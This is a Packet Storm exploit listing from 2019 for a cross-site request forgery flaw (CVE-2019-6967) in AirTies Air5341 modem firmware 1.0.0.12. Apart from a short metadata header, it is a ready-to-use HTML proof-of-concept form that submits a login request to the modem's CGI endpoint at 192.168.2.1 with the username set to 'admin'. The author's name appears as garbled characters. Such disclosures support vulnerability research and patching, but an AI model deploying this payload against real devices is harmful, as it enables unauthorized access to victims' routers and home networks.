AirTies Air5341 Modem 1.0.0.12 Cross Site Request Forgery

2019-01-29T00:00:00
ID PACKETSTORM:151372
Type packetstorm
Reporter Ali Can Gonullu
Modified 2019-01-29T00:00:00

Description

                                        
                                            `# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC  
# Version: AirTies Modem Firmware 1.0.0.12  
# Tested on: Windows 10 x64  
# CVE : CVE-2019-6967  
# Author : Ali Can GAPnA1/4llA1/4  
  
<html>  
<form method="POST" name="formlogin" action="  
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">  
<input type="hidden" id="redirect" name="redirect">  
<input type="hidden" id="self" name="self">  
<input name="user" type="text" id="uiPostGetPage" value="admin"  
size="">  
<input name="password" type="password" id="uiPostPassword" size="">  
<input onclick="uiDologin();" name="gonder" type="submit"  
class="buton_text" id="__ML_ok" value="TAMAM"  
style="background-image:url(images/buton_bg2.gif); height:21px;  
width:110px; border: 0pt none">  
</form>  
</html>  
`